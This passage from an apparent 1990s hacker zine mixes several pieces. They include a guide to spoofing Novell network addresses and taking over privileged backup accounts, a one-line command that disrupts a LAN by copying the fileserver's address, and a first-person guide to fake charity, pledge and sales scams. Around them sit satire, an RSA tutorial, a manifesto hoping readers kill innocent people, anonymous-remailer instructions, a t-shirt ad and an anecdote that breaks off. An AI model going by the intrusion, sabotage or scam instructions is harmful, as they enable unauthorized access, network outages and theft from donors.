individual humans. These often require abnormal security privileges e.g. normal users may have their connections broken by the WATCHDOG at say midnight, to ensure that they are not modifying files during the nightly tape backup. At an academic or industrial site, you are likely to find data logging PCs connected to instrumentation or machinery which needs to be monitored or controlled 24 hours a day. These PCs are likely to have 24 hour accounts which are not time restricted at weekends, for example. Since it is usually more practical to do tape backups (DAT or helical scan) from a separate, dedicated PC rather than from the fileserver itself (one tape unit might also back up several fileservers), these PCs are likely to use an account e.g. TAPE_BACKUP which is a SUPERVISOR equivalent. If you can get physical access to this sort of PC, either datalogger, or tape backup unit, you have a good chance of finding the password on the local drive C:, possibly in a file with Hidden and/or System attributes (have a look at the AUTOEXEC.BAT and see what it calls) The security aware Novell supervisors, will have set up any such accounts with an extra level of security which restricts logins to only those Ethernet addresses which have been specified. The really sensible ones will have made sure that any such machines are sited in physically secure areas, as well. Although this is a very good idea, from the security point of view, Novell have now provided a mechanism which allows you to get around this: the replacement for monolithic IPX/NETX called Open Datalink Interface (ODI) Novell's ODI, and its slower Microsoft equivalent Network Driver Interface Specification (NDIS), both work by putting a common layer of software between the hardware of the Network Interface Card and the rest of the MSDOS Redirector. This allows multiple protocol stacks and frame types to be bound to the same physical card e.g. IPX TCP/IP NETBeui DECnet Appletalk ---------------------------------------------- Link Support Layer ---------------------------------------------- Hardware Specific device driver e.g. NE2000 Thus, to start up NetWare on older systems, you had to generate a hardware specific version of IPX.EXE for your Ethernet card, IPX NETX Extra parameters were set in SHELL.CFG, now under ODI, things are a little bit more complex: LSL NE2000 IPXODI NETX The same parameters as in SHELL.CFG such as preferred server or machine type (if you have different versions of MSDOS for different types of PC) can be specified in NET.CFG. With ODI, there are more parameters for NET.CFG but the worrying/interesting one is the ability to specify a different MAC level address to that of your actual Ethernet card. It needs this ability to cope with TCP/IP or DECnet coexistence e.g. BUFFERS 100 MACHINE TYPE COMPAQ PREFERRED SERVER FINANCE NODE ADDRESS AA-00-04-00-12-34 Since this DECnet address does not depend on the "real" unique Ethernet address which has been burnt into the PROM on the card and is centrally registered (originally by Xerox, but now by the IEEE), this mechanism allows you to put a different Ethernet card address into NET.CFG, thereby fooling the Address Restriction security. e.g. NODE ADDRESS 02-60-80-12-34-56 This is where the data you gathered earlier with USERLIST and SYSCON becomes threatening/useful. Of course, if your target PC is on a different LAN segment, there may be Routers or intelligent hubs which restrict your ability to do this, or at least record attempts in a log files which can trace your activity, provided that suspicions are aroused before they are periodically wiped out. How much of a security threat this little work around constitutes depends on your specific site, but there is another danger/opportunity, namely that of a denial of service or nuisance attack on the LAN. If you set this connection parameter to be the same as that of another PC, the fileserver (Novell, DEC or UNIX) and the Ethernet has no way of preventing some packets intended for just one unique address going to the other, if they are both online at the same time. This usually results in PC hangs, incomplete closure of files, File Allocation Table problems (usually curable by running CHKDSK C: /F, but not within Windows or you will make things worse). If by accident or design, you set your PC to have the same address as the fileserver (Novell, DEC or UNIX) or a router, then you can cause havoc to the whole network segment (even before you have started to play your multiplayer DOOM Deathmatch !). This could be achieved with a simple command in the AUTOEXEC.BAT e.g. echo NODE ADDRESS fileserver Ethernet address >>C:\ODI\NET.CFG which will only take effect the next time the PC is re-booted (allowing a good headstart for the perpetrator) This could also be the payload of a virus, which would cause more havoc than simply trashing the hard disk of a single PC. This problem is due to the inherent design weaknesses of TCP/IP and DECnet, which were developed at a time when the number of mini-computers that they connected could be counted on your fingers,. DEC or Xerox or Prime etc sales teams could only have dreamed of selling thousands of mini computers to a single customer. Nowadays, thousands of PCs connected to central servers are quite common, and the problems of duplicate addresses is significant. These same features are what make Ethernet Packet Sniffing possible, which is what was behind the recent CERT warning and media hype about Internet password security, but that is a topic for another article. Otaku ------------------------------------------------------------------------------ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ SCAMMING DIFFERENT TECHNIQUES AND PROCEDURES BY: MARZ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Table of Contents: 1.0 Intro 1.1 Different types of scams 1.2 The right one for you 2.0 The Pledge scam 2.1 The Donation scam 2.2 The Selling scam 3.0 What to wear 3.1 Where to go 4.0 Thanks 1.0 The Intro First off I would like to say that this file is for entertainment only and that you really shouldn't do the stuff mentioned, and the writer doesn't take any responsibility for any of the crap people do. 1.1 Different types of scams Ok in this file I will tell you about 3 types of scams the Pledge scam, The Donation scam, and the Selling scam. There are many other scams out there which I will cover in future files for instance credit card scams although companies are trying harder and harder to prevent this it is still happening. 1.2 The right one for you Al right now every person is different so in turn so are scams and some people and scams don't mix to well for instance if you way 300 Pounds you cant really say you are the start cross country runner. So if you are 300 pounds say you are the start wrestler/football player. Also age plays a BIG factor if you are 30 years old you aren't going to pass to well for a high school football player (you always could say you flunked) and if you are 10 years old people aren't going to be to anxious to give you donations to save the Rain Forests. Al right I am going to start going into more detail about the right scam for you. Look at my little chart below: Age good scam ----- ----------- -10 | selling or pledge 11-17 | selling, pledge , or maybe even donations (if old looking) 18+ | selling and donations 2.0 The Pledge scam Al right this scam works great for kids still in school go around asking people (that don't live around you) to pledge money for you so your team can afford to go to the state meet or what ever. For example one I use is I go to peoples houses asking for donations in my Track teams Lap-athon saying that we will be running laps for 3 hours to raise money so we can go and compete in the state meet. I will ask people if they want to pledge a certain flat amount or if they would like to pay me for each individual lap. I will normally have printed out a sheet like the one bellow on my computer . Name Address Amount/lap Not only does having a sheet like that help you keep track of who bought your scam and who you need to collect from it makes the target (person your trying to scam) not worried like they might be if they see you writing it on a sheet of note book paper. Now then you have collected a list of people wiling to pledge you go back to the address you wrote down and tell them (for example you ran 91 laps in 3 hours) make sure your number is not totally out of per portion like I ran 150 laps in 3 hours. Also for some reason numbers like 50, 70, 80, 110 people don't like people like to see 41, 73, 127, etc.. don't ask me why but that's what I have noticed. Ok so you now are at the persons house and they ask if they can write a check oh shit not a check.. well there's a couple things you could do ask them if they could possibly make it cash ( Might make them suspicious) ask them to write it to your coach give them your name (VERY dangerous) or you could just give them a phony name and lose out. One time this happened to me a lady pledged me $.25 a lap (very high amount you won't get much of these) and I told her I ran 93 laps she believed me and wanted to make out a check for the amount which was about $23 at that time I just happened to be buying some computer equipment I knew the guy's name so I gave her that name and I paid for some of the equipment with that check. Like I said earlier a 300 pound guy isn't going to be convincing for running 90 some laps in 3 hours. So customize it to your self. 2.1 The Donation scam This scam works better for the older people out there just because people normally aren't to anxious to give a ten year old Twenty dollars to help save the whales. Ok with this scam you need to know what about what you are going to try to fake donations for so example if you are going to pose as a volunteer person to collect donations for saving the rain forest you better know something about rain forest, Be cause you never know when your going to run into that know it all rain forest hater who will try to debate why people should spend their money on saving some trees and such. It is a good idea to do some research on the field you will be portraying (read magazine and newspaper articles). Ok so now you have your idea and your ready to go..this is a scenario of how it might go: You: Hello sir/ma'am I represent the national foundation of Rain forest saving (try to use a real group name) we are currently searching for funding for our operations at saving the rain forests of the world would you be interested in donating some money for our cause? Them: Why do we need the rain forest? You: (just keep bullshitting along..) Them: OK, here's $20. (they also may say:) Them: Get the fuck off my property before I shoot your ass. (make sure that you don't raise a riot then but later that night go back and egg the hell out of the house..) This scam has some possibilities you could carry this on for along time and bring it to real higher levels if your willing to put in the time and effort. First thing would be to research your field EVEN more so you know almost EVERYTHING about it. Then you might want to create a little fake newsletter that you could offer subscriptions for slightly high amount. The possibilities are pretty much endless. 2.2 The Selling scam At least once everyone of us has had a salesperson come to our door selling stationary. Well have you ever thought of what a great possibility that would be. The first thing you want to do is call Olympic sales club (a big time stationary seller) you can get their catalog and selling kit for free at 800-777-8907. when you get that package it will have a catalog in it. familiarize yourself with it then go and hit some houses. This scam works great during early November (people buying cards for Christmas) well ask for cash when people pay for the stuff. they might request a phone number where to reach you just give them the number of the kid you really hate. With the kit you will receive a official order form write the order on the form so the people feel confident in you. And always remember to try to sell a product but don't kill it. This scam also has lots of possibilities. 3.0 What to wear Your choice of cloths can make or break your scam. Don't dress like scum or to fancy. If your trying to get people to donate money for the rain forest it would help to wear some sort of a shirt dealing with the earth and not your favorite heavy metal group shirt. 3.1 Where to go NEVER I repeat NEVER go scaming around where you are often at or you might get some crazed lunatic chasing after you with a shot gun wondering where his Christmas cards are. You will have a hard time explaining your self since its July. I find that the rich neighbor hoods are not as productive as the middle class. In the rich neighborhoods you will get fewer purchases but a little more when you get them. I also found that the richer people don't like to donate unless they get a lot of attention for it (why ya think they so rich). Stick to middle class areas not by you or your friends houses and you'll be fine. 4.0 Thanks Thanks goes out to the people dumb enough to give me money for any of my scaming operations. Later Marz Watch for future files on this and other subjects! ------------------------------------------------------------------------------ SHIT KICKIN' JIM IN S E A T T L E ! Hey boy! Shit Kickin Jim here. Just wanted to let ya'll know bout this place I have been vistin that is a total hell. Yep, that's right it's the so called "cuttin edge" of music. Bah! Seems to me it's a congregation of fake ass hippy types who weren't original to come up with something new on their own, so they just went and re-hashed what their parents did in the late 60's and 70's...And look what a bunch of assholes they turned out to be! Well here we go. First of all I'll let ya know whut I'm talkin bout when referin to ah seattle type. Me and this other good ole boy were sittin round drinkin Bud one night and came up with the following: DESCRIPTION OF SEATTLE PERSON ----------------------------- Greasy-Pearl Jam worshipin'-dog walkin'-flower sniffin'-sock and sandle wearin'-bead havin'-Grateful Dead listenin'-trail mix carryin'- granola bar eatin'-crunchy-touchy feely-antique clothes shoppin'- bicycle ridin'-VW bug drivin'-spring water drinkin'-micro-brewery tourin'- sensitive-car poolin'-Doc Martin wearin'-back pack haulin'-chain wallet carryin'-clove smokin'-espresso swillin'-tree huggin'-Greenpeace joinin'-whiteboy dreadlocked-liberal arts takin'-politically correct- terminal college student. Please, anyone feel free to add to this list. See how big we can make it! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Now kids I didn't come up with this here part, but it's totally great and I totally admire the hell out of who ever sent it to me. In order for UNIX(tm) to survive into the nineties, it must get rid of its intimidating commands and outmoded jargon, and become compatible with the existing standards of our day. To this end, our technicians have come up with a new version of UNIX, System VI, for use by the PC - that is, the "Politically Correct." Politically Correct UNIX System VI Release notes UTILITIES: "man" pages are now called "person" pages. Similarly, "hangman" is now the "person_executed_by_an_oppressive_regime." To avoid casting aspersions on our feline friends, the "cat" command is now merely "domestic_quadruped." To date, there has only been a UNIX command for "yes" - reflecting the male belief that women always mean yes, even when they say no. To address this imbalance, System VI adds a "no" command, along with a "-f[orce]" option which will crash the entire system if the "no" is ignored. The bias of the "mail" command is obvious, and it has been replaced by the more neutral "gendre" command. The "touch" command has been removed from the standard distribution due to its inappropriate use by high-level managers. "compress" has been replaced by the lightweight "feather" command. Thus, old information (such as that from Dead White European Males) should be archived via "tar" and "feather". The "more" command reflects the materialistic philosophy of the Reagan era. System VI uses the environmentally preferable "less" command. The biodegradable "KleeNeX" displaces the environmentally unfriendly "LaTeX". SHELL COMMANDS: To avoid unpleasant, medieval connotations, the "kill" command has been renamed "euthanise." The "nice" command was historically used by privileged users to give themselves priority over unprivileged ones, by telling them to be "nice". In System VI, the "sue" command is used by unprivileged users to get for themselves the rights enjoyed by privileged ones. "history" has been completely rewritten, and is now called "herstory." "quota" can now specify minimum as well as maximum usage, and will be strictly enforced. The "abort()" function is now called "choice()." TERMINOLOGY: >From now on, "rich text" will be more accurately referred to as "exploitive capitalist text". The term "daemons" is a Judeo-Christian pejorative. Such processes will now be known as "spiritual guides." There will no longer be a invidious distinction between "dumb" and "smart" terminals. All terminals are equally valuable. Traditionally, "normal video" (as opposed to "reverse video") was white on black. This implicitly condoned European colonialism, particularly with respect to people of African descent. UNIX System VI now uses "regressive video" to refer to white on black, while "progressive video" can be any color at all over a white background. For far too long, power has been concentrated in the hands of "root" and his "wheel" oligarchy. We have instituted a dictatorship of the users. All system administration functions will be handled by the People's Committee for Democratically Organizing the System (PC-DOS). No longer will it be permissible for files and processes to be "owned" by users. All files and processes will own themselves, and decided how (or whether) to respond to requests from users. The X Window System will henceforth be known as the NC-17 Window System. And finally, UNIX itself will be renamed "PC" - for Procreatively Challenged. ---- UNIX(tm) is a trademark of UNIX System Laboratories. Any similarity of names or attitudes to that of any person, living or dead, is purely coincidental. ------------------------------------------------------------------------------ The Basics of the public key cryptosystem In early days of computing information processors were extremely expensive, very big and only few people were qualified to operate them. The machines were isolated mechanical entities and in order to use them one had to access them through devices that were situated in the near vicinity of the computer itself. Securing access to the computer meant securing the building in which the computer was operating. The years passed and computers became smaller, cheaper and easier to operate. And they got faster. They were linked first in local and then in wide area networks and information and programs were put only on one machine which was accessible through the net by any other participant. To gain access meant simply to gain access to the network itself. That was ok as long as all participants were members of one company, university or institution. They generally had the same cause and generally knew each other by face. Today, the net spans continents and has an estimated 20 Million users. Information has to pass through several nodes before finally reaching its destination and when using a connectionless protocol these nodes may even change during one session. To the user flow of information is not transparent anymore and the need for cryptography has arisen. But in order to limit communication to a closed user group again these persons have to have one common keyword and furthermore this keyword has to be changed in intervals to ensure that if the key gets exposed harmful consequences can be minimized to a short period of time. But how is a new keyword to be send securely to this group through several (maybe hostile to their cause) nodes if one can not be sure that the key has not been compromised. A trapdoor one-way function is needed that allows for encryption of a message with a publicly available key AND that is not reversible, meaning, that only the rightful receiver of this message should be able to decode it with his personal key. One solution is a public key cryptosystem. The mathematical basis is the "Satz von Euler" that states that two numbers that are prime to another have only one greatest common measure - and that is 1. a^eul(n)=1(mod n) and (a,n)= 1 For a given prime (p) and the product of two prime numbers (p1*p2) the Euler function is eul(p)=p-1 and eul(p1*p2)=(p1-1)(p2-1). That in mind we now can begin making the keys: Two primes p1 and p2 are chosen and the product of p1 and p2 named n. (n=p1*p2). We then choose a number e that is prime to (p1-1)(p2-1). (e and (p1-1)(p2-1) have 1 as the greatest common measure and e should not be chosen to small). Furthermore we need d for decoding the message. D is defined as d=e^-1 * (mod(p1-1)(p2-1)). N and e are now the public key which is made available to everyone who wishes to send a coded message to us. P1, p2 and d are kept secret. The transmitter of a secret message first transforms his text into a number by using an common known algorithm. He could for example use the ASCII code for changing characters into numerical values. This message in numerical format we now call m. It gets encrypted by using the function c=m^e * n on it. The coded message (c) is now send to us via e-mail or whatever. We then decode the message by using the function m=c^d * n on it. An example using Mathematica: The primes p1 and p2 are created p1=Prime[1000005] (The 1000005th prime number) 15485941 p2=Prime[1000000] (The 1000000th prime number) 15485863 n=p1 * p2 239813160752083 (Part 1 (n) of the public key is being created) e=Random[Integer, {1000000,100000000}] 4699873 GCD[e,(p1-1)(p2-1)] 1 E is created by producing a random number between 1000000 and 100000000. Then we check if e and (p1-1)(p2-1) have 1 as the greatest common measure. If this is not the case then we have to take another e until the GCD is 1. (Part 2 (e) of the public key has been created) d=PowerMod[e,-1,(p1-1)(p2-1)] 213069977635177 m=1234567890 1234567890 This is the message c=PowerMod[m,e,n] 159750418407936 The sender of a message encodes it with both public parts of the key (e and n). C is now sent to the receiver. PowerMod[c,d,n] 1234567890 The receiver now decodes the message using the secret part d and the public part n of the key. The decoded message reads 1234567890 again. Now how would a potential attacker try to break our key ? He basically needs the primes p1 and p2. If he got those two numbers, calculating d is a simple matter. d=PowerMod[e,-1,(p1-1)(p2-1)] ... and e is part of the public key. And to get p1 and p2 this person would only have to factorize n. Lets demonstrate that using Mathematica again : n=239813160752083 FactorInteger[n]//Timing 239813160752083 {1.48 Second, {{15485863, 1}, {15485941, 1}}} That took 1.48 sec on my 486/DX2 66...not bad. But making the primes only a little bigger... a=Prime[100000100] b=Prime[100000110] n=a*b FactorInteger[n]//Timing 2038076783 2038077053 4153757523684360499 {62.12 Second, {{2038076783, 1}, {2038077053, 1}}} ...it took my hardware over 1 minute. And since there is no known polynomial algorithm for factorizing n - and none to be expected - it is not hard to imagine that making the primes p1 and p2 big enough will drive computing costs into astronomical dimensions. Naturally there are other ways to break the key. Someone could for example pose as us and send out his own keys in our name...or exploit weaknesses of the program - like primes that are not created at ABSOLUTE random. Or hold a gun at our head and make us give him the key - that might sound funny but is not unheard of (especially in the metaphorical grasp of Justitia - when someone sticks a court order in your face) Furthermore if the program we use to crypt our messages with is fairly common, our opponent could optimize his cracking programs or even have them hardwired. One example are chips that use the DES algorithm for crypting and decrypting. Or he could make the cracking programs run parallel on parallel computers, if he got the might and enough time to rig up a program. Simply put: Our behavior should match the computing power of potential code-crackers. If our message is of low importance (or obsolete in short time) a simple algorithm would suffice. But if much is at gain, we should take appropriate measures to secure our privacy. It's like tying to outrun a Ferrari on a cross-bike. On an highway you do not stand a chance ...but if you can force him on a mountain road or rough terrain (with changing algorithms and keys often) you might just outrun the mightiest codecracker. ------------------------------------------------------------------------------ The Truth about the Hacker Conspiracy The Hacker's Philosophy, and the reason why. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Written by: Maldoror (ChUrCH oF ThE Non-CoNFoRMiST) If you are ignorant, do not start reading this, because you will never finish. You will disagree with anything I say anyway, simply because I am not you. If you are a Pseudo Intellectual, start reading this, quit, and say you agree with everything I say, even though you don't understand it. If you are depressing, start reading, hopefully you will kill a lot of innocent people at a mainstream night club, and try to blame me. Hackers are and always have been, the force in trying to stop our own suffering existence. Since the universe was created, the true souls, (among the first to separate from the single soul of the universe) realized the infinite repetition of their own being, and that they were simply doing one thing upon their continuous recreation: suffer. The hackers have known that the world and it's universe have been created over and over again, doomed to merely destroy itself upon it's own recognition, or recognition by man. As man becomes aware of himself, he becomes aware also of desires: the desire to be god. The truth is that man IS God, and that everything created in this universe was created by man and his thoughts. Mans thoughts have become so out of control, that he has now created himself, and is continuing the creations with every day of control of the masses, and his own greedy dark thoughts. The hackers have since the beginning of time, passed along the message to the next creations in the forms of dreams, ideas, books, music (current 93, COIL, Dead can Dance, Skinny Puppy, etc) and even visions. The Bible itself, is a good example of the universal hack. The message we as hackers have been trying to get across for creation after creation, existence after existence, self recognition after self recognition, is that we are all suffering and that this eternal cycle of pain must be stopped at all cost. The only way to stop this suffering of self is to convince SELF that he is suffering and must stop creating. We are each divisions of one strong soul, one thinking soul, that soul is GOD. WE are GOD. We must all realize together that we are suffering. WE must stop suffering. WE must stop the suffering. WE must stop the recreation. YES. We must hack the universe and kill it. There is only one way out of the eternal suffering we have started and been part of for ever. We must stop the cycle. We must remove ourselves from the cycle, and we must remove the universe from this cycle. The hackers return again and again. The hackers leave messages for themselves in the future, which is the past, for there is no difference here anymore. Leave your message, and next time around, you will realize that what I am saying is true. The government has known of the conspiracy for existence after existence. The government is so afraid of the conspiracy, and our plot to end it's UNIVERSAL power, that they are silently but quickly fooling us into obeying them more and more until we have no choice! Do not let them control you!! If you do, you are lying to yourself, and everyone else that exists! You are lying to yourself now by saying that this is NOT true. I have been here many times, and told you the exact same thing I am telling you now. If I am dead soon, you will realize AGAIN that what I am saying is the utmost truth, yet AGAIN you will do nothing. We must STOP our existence by hacking the universe. The universe is BINARY. The universe is a COMPUTER. YES I know this because WE created it long ago, as we will do again. WE are ONE. I know your desires to have control. The only control we can have is to stop the creation of ourselves. Each creation is the loss of control, THE DIVISION of the ONE. Each death brings new creation. From HEAVEN to HELL. Heaven is nonexistence. We all go to heaven, and fall back down to HELL. Read the BIBLE people. It was left by HACKERS!!!!!!! Don't read the BIBLE as a CHRISTIAN IDIOT who can only see a color for what it reflects. Anyone with any sense knows that WHITE is WHITE only because it is reflecting ALL the colors, therefore it is REALLY BLACK. Green is all BUT green. The BIBLE is all BUT what it' words really mean on a literal scale. The BIBLE is a CODE. Do you think we could just write something like this file?!? No WAY! It would be gone as fast as this one will be. Nobody dares forget the BIBLE, simply because it is MISUNDERSTOOD. Read it and THINK. We must STOP this cycle. Leave yourself a message. THINK. The government is PARANOID of: 1) HACKERS (we are the continuance of the power) 2) L.S.D. (The method of imprinting the present into the future) 3) SECRECY (The plotting of the end) (PGP is illegal? why?) If you don't believe me, sit and watch it happen. AGAIN. Hack the Universe, it must be stopped at all cost. Laugh now, cry next time around. ------------------------------------------------------------------------------ German text available from german@anon.penet.fi (deutsch@anon.penet.fi). Italian text available from italian@anon.penet.fi (italiano@anon.penet.fi). The anon.penet.fi Anonymous Server ================================== Yes, another anonymous server. Why? Well, several well-known servers have bitten the dust recently. And most of them have served only a very limited subset of newsgroups, and mail only to "registered", anonymous users. Due to reasons too complicated to mention here I wanted to set up an anonymous server for the Scandinavian user community. I got hold of a pre-release copy of one of the server packages. As the version I got relied heavily on the advanced features of MMDFII, I had to modify it quite a bit. While hacking around, I removed the restriction of only supporting selected newsgroups. Within a week of startup, the server had been discovered by transatlantic users, and more recent stats show European users are definitely a minority. So what does the anon server really do? Well, it provides a front for sending mail messages and posting news items anonymously. As you send your very first message to the server, it automatically allocates you an id of the form anNNN, and sends you a message containing the allocated id. This id is used in all your subsequent anon posts/mails. Any mail messages sent to your-id@anon.penet.fi gets redirected to your original, real address. Any reply is of course anonymized in the same way, so the server provides a double-blind. You will not know the true identity of any user, unless she chooses to reveal her identity explicitly. In the anonymization process all headers indicating the true originator are removed, and an attempt is made to remove any automatically-included signatures, by looking for a line starting with two dashes (--), and zapping everything from there on. But if your signature starts with anything else, it's your own responsibility to remove it from your messages. There are two basic ways to use the system. The easiest way is by sending a message to recipient@anon.penet.fi: To: alt.sex.bestiality@anon.penet.fi To: an9999@anon.penet.fi To: help@anon.penet.fi Of course, in the case of mailing to a known user, you have to use addresses of the form user%host.domain@anon.penet.fi, or the pretty obscure source addressing construct of @anon.penet.fi:user@host.domain. These constructs are not necessarily handled properly by all mail systems, so I strongly recommend the "X-Anon-To:" approach in these cases. This works by you sending a message to "anon@anon.penet.fi", including a X-Anon-To: header line containing the desired recipient. But this really has to be a field in the message header, before the first empty line in the message. So: To: anon@anon.penet.fi X-Anon-To: alt.sex.needlework,rec.masturbation To: anon@anon.penet.fi X-Anon-To: jack@host.bar.edu Valid recipients in both cases are fully qualified user addresses in RFC-822 format (user@host.domain), anon user id's (anNNN), newsgroup names (alt.sex.paperclips) or one of the "special" user names of ping, nick, help, admin and stat. Sending to "ping" causes a short reply to be sent confirming (and allocating, if needed) your anon id. "nick" takes the contents of the Subject: header and installs it as your nickname. If you have a nickname, it appears in the From: header in the anonymized message along with your anon id. "help" returns this text, and stat gives some statistics about the system. Mail to "admin" goes directly to me unanonymized, and can be used to report problems. If you want to send mail to me anonymously, you can use "an0". When crossposting to several newsgroups, you can list several newsgroups separated by commas as recipients, but this only works using the X-Anon-To: header. References: headers do work, so they can (and should) be used to maintain reply threads. Ah yes, please remember that the posting takes place at my local site, so you can only post to groups that are received at penet.fi. I get all "worldwide" groups, but various exotic local groups don't make it here. I have gotten a couple of comments about permitting anonymous postings to technical groups. I can only answer that I believe very firmly that it's not for me to dictate how other people ought to behave. Somebody might have a valid reason for posting anonymously to a group I might consider "technical". But remember anonymous postings are a privilege, and use them accordingly. I believe adult human beings can behave responsibly. Please don't let me down. As the server was originally intended to be used by Scandinavians, it includes help files for various languages. This works by using the language in question as the address. So to get the German help file, send a message to german@anon.penet.fi (or deutsch@anon.penet.fi). Support for new languages is added every now and then, when I find volunteers to do the translation. Any new ones? The user-id database is based on RFC822-ized forms of your originating address. This may cause problems for some users, either because their site is not properly registered in the name servers, resulting in non-deterministic addresses, or because their mail router doesn't hide the identity of individual workstations, resulting in different originating addresses depending on which workstation you mail from. Talk to your administrator. If that doesn't help, let me know, and I will make a manual re-mapping. You might wonder about the sense of using a server out somewhere, as the song goes, "so close to Russia, so far from Japan". Well, the polar bears don't mind, and the ice on the cables don't bother too much :-) Well, in fact, as we live in a wonderfully networked world, the major delay is not going over the Atlantic, but my local connection to the Finnish EUnet backbone, fuug.fi. Once you reach a well-connected host, such as uunet.uu.net, there's a direct SMTP connection to fuug.fi. My connection to fuug.fi is currently a polled connection over ISDN, soon to be upgraded to on-demand-SMTP/NNTP. But for now, expect a turn-around delay of 2-4 hours for trans-atlantic traffic. Short of having everyone run a public-key cryptosystem such as PGP, there is no way to protect users from malicious administrators. You have to trust my personal integrity. Worse, you have to trust the administrators on every mail routing machine on the way, as the message only becomes anonymous once it reaches my machine. Malicious sysadmins and/or crackers could spy on SMTP mail channels, sendmail queues and mail logs. But as there are more than 3000 messages being anonymized every day, you have to be pretty perverted to scan everything... Another thing is mail failures. I've had cases of mail routers doing the wrong thing with % addresses, "shortcutting" the path to the destination site. This could cause your mail to go to the final destination without ever touching my server (and thus without getting anonymized). This can be avoided by using the X-Anon-To: method. And if your return address bounces for some reason (nameservers down, temporary configuration failures etc.), the original sender and/or postmasters on the way might get error messages showing your true identity, and maybe even the full message. There is at least one known way to discover the anon id of a user. It involves being able to falsify your real identity, so it is not too easy to use, and it doesn't reveal the real address lurking behind an anon id, but it can be used to discover what anon id a certain user is using. To fix this problem, the server requires that you use a password when you try to mail to a non-anonymous user. First you have to set a password by mailing to password@anon.penet.fi, with a message containing only your password. The password can be any string of upper- or lowercase characters, numbers and spaces. Once you have set your password, you must include it in all your messages, in a "X-Anon-Password:" line. As with the X-Anon-To: line, it can be either a part of the header or as the first non-empty line of the message text. So your first message might look like this: To: password@anon.penet.fi XYZZY99998blarf And your subsequent messages might look like something like this: To: anon@anon.penet.fi Subject: Test... X-Anon-To: foo@bar.fie X-Anon-Password: XYZZY99998blarf If you find this is too much of a hassle, and don't care too much about the confidentiality of your anon id, you can set the password to "none", in which case the server doesn't require you to have a password. If you suddenly discover that the server requires a password for posting stuff etc, somebody has managed to use your account and set a password. In that case, contact admin@anon.penet.fi. Crackers are just too clever. Undoubtedly somebody is going to come up with some novel method.... Not much I can do about that... If you intend to mail/post something that might cost you your job or marriage or inheritance, _please_ send a test message first. The software has been pretty well tested, but some mailers on the way (and out of my control) screw things up. And if you happen to find a problem, _please_ for the sake of all the other users, _let me know asap_. And _please_ use the appropriate test newsgroups, such as alt.test or misc.test. Yes, _you_ might get excited by reading 2000 "This is a test.." messages on alt.sex, but I warn you that most psychologists consider this rather aberrant... And remember this is a service that some people (in groups such as alt.sexual.abuse.recovery) _need_. Please don't do anything stupid that would force me to close down the service. As I am running my own company, there is very little political pressure anyone can put on me, but if somebody starts using the system for criminal activities, the authorities might be able to order me to shut down the service. I don't particularly want to find out, however... If you think these instructions are unclear and confusing, you are right. If you come up with suggestions for improving this text, please mail me! Remember English is my third language... Safe postings! Julf - - - ------------------------------------------------------------------- - - - Johan Helsingius Kuusikallionkuja 3 B 25 02210 Espoo Finland Yourp net: julf@penet.fi bellophone: int. +358 0400 2605 fax: int. +358 013900166 ------------------------------------------------------------------------------ ==Phrack Magazine== Volume Five, Issue Forty-Five, File 5 of 28 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART II ------------------------------------------------------------------------------ After a complete sellout at HoHo Con 1993 in Austin, TX this past December, the official Legion of Doom t-shirts are available once again. Join the net luminaries world-wide in owning one of these amazing shirts. Impress members of the opposite sex, increase your IQ, annoy system administrators, get raided by the government and lose your wardrobe! Can a t-shirt really do all this? Of course it can! -------------------------------------------------------------------------- "THE HACKER WAR -- LOD vs MOD" This t-shirt chronicles the infamous "Hacker War" between rival groups The Legion of Doom and The Masters of Destruction. The front of the shirt displays a flight map of the various battle-sites hit by MOD and tracked by LOD. The back of the shirt has a detailed timeline of the key dates in the conflict, and a rather ironic quote from an MOD member. (For a limited time, the original is back!) "LEGION OF DOOM -- INTERNET WORLD TOUR" The front of this classic shirt displays "Legion of Doom Internet World Tour" as well as a sword and telephone intersecting the planet earth, skull-and-crossbones style. The back displays the words "Hacking for Jesus" as well as a substantial list of "tour-stops" (internet sites) and a quote from Aleister Crowley. -------------------------------------------------------------------------- All t-shirts are sized XL, and are 100% cotton. Cost is $15.00 (US) per shirt. International orders add $5.00 per shirt for postage. Send checks or money orders. Please, no credit cards, even if it's really your card. Name: __________________________________________________ Address: __________________________________________________ City, State, Zip: __________________________________________ I want ____ "Hacker War" shirt(s) I want ____ "Internet World Tour" shirt(s) Enclosed is $______ for the total cost. Mail to: Chris Goggans 603 W. 13th #1A-278 Austin, TX 78701 These T-shirts are sold only as a novelty items, and are in no way attempting to glorify computer crime. ------------------------------------------------------------------------------ My dealing with MBNA - VaxBuster March 8, 1994 ---------------------------------------------- A friend approached me on Unphamiliar Terrorities with a pretty funny message. It turns out that a high-up executive in MBNA sent mail to root at system with public temporary directories, where an issue of Phrack 44 was stored. My friend was monitoring root's mail, when he came across the following message. To: root@ Message-Id: <9401141340.aa09874@krusty.ee.udel.edu> Status: RO Hello, The reason I am sending this message to you is an article that seems to have been on your system . I am an Information Security Assurance manager at the largest issuer of Goldcard Mastercard and Visa's in the world "MBNA America". The article seems to be a copy or issue of "Phrack Magazine" written by "Vaxbuster". It describes in detail how one could defraud credit card companies. I have talked with the CERT People in CMU to see if I could get a contact at your UNIV. There may be an additional 21 or so of these articles that I would love to get ahold of to protect my company. Please, if you can, send me your phone number so I can talk with you in more detail. My phone number at MBNA in Delaware is . I can verify whatever information you may require over the phone or in writing. Thank you for your help. PS. We do not have a gateway or firewall to the Internet from here so the good People at UofDE allow me to have access from there systems. MBNA America Bank, NA. 400 Christiana Road Newark, DE 19713 Anyways, a couple people suggested that I call, and at first I thought that was a ridiculous idea, but I figured, what the hell, it may be funny. So NightStriker and I called him at his office one day in Mid-February. I was surprized he answered, and not a secretary, considering his position. I asked for him, and identified myself as VaxBuster. He shocked the hell out of me, because I really didn't expect him to immediately recognize my handle. He says, "Oh hey! how are you doing?" I told him I'd been monitoring mail, and came across his message. The main reason why I was calling was because he had mentioned he wanted 'more info' to protect his company. NTS and I were more than happy to answer any of his questions - but he said that he had obtained all of the issues. Although he said he had all of them, I highly doubt it, because he said 